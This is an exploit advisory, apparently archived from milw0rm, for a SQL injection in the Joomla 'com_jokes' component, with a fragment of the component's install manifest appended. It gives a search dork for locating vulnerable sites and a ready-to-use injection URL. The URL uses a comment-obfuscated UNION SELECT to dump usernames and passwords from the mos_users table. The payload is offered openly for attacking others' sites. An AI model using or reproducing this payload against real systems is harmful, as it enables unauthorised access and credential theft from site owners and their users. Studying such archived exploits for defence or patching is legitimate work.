38 lines
No EOL
1.3 KiB
Text
38 lines
No EOL
1.3 KiB
Text
#########################################################################
|
|
#
|
|
# joomla SQL Injection(com_jokes)
|
|
#
|
|
#########################################################################
|
|
#
|
|
# AUTHOR : S@BUN
|
|
#
|
|
# HOME : http://www.hackturkiye.com/
|
|
|
|
#########################################################################
|
|
#
|
|
# DorKs 1 : allinurl: "com_jokes"
|
|
#
|
|
########################################################################
|
|
EXPLOIT :
|
|
|
|
index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
|
|
|
|
#########################################################################
|
|
# S@BUN www.hackturkiye.com S@BUN
|
|
#########################################################################
|
|
# S@BUN GOOD LUCKY S@BUN
|
|
#########################################################################
|
|
|
|
|
|
<mosinstall type="component">
|
|
<name>jokes</name>
|
|
<creationDate>29/12/2005</creationDate>
|
|
<author>Atapin</author>
|
|
<copyright>Released under the GNU/GPL License</copyright>
|
|
<authorEmail>info@atapin.net</authorEmail>
|
|
|
|
<authorUrl>www.atapin.net</authorUrl>
|
|
<version>1.0</version>
|
|
<description></description>
|
|
|
|
# milw0rm.com [2008-01-30] |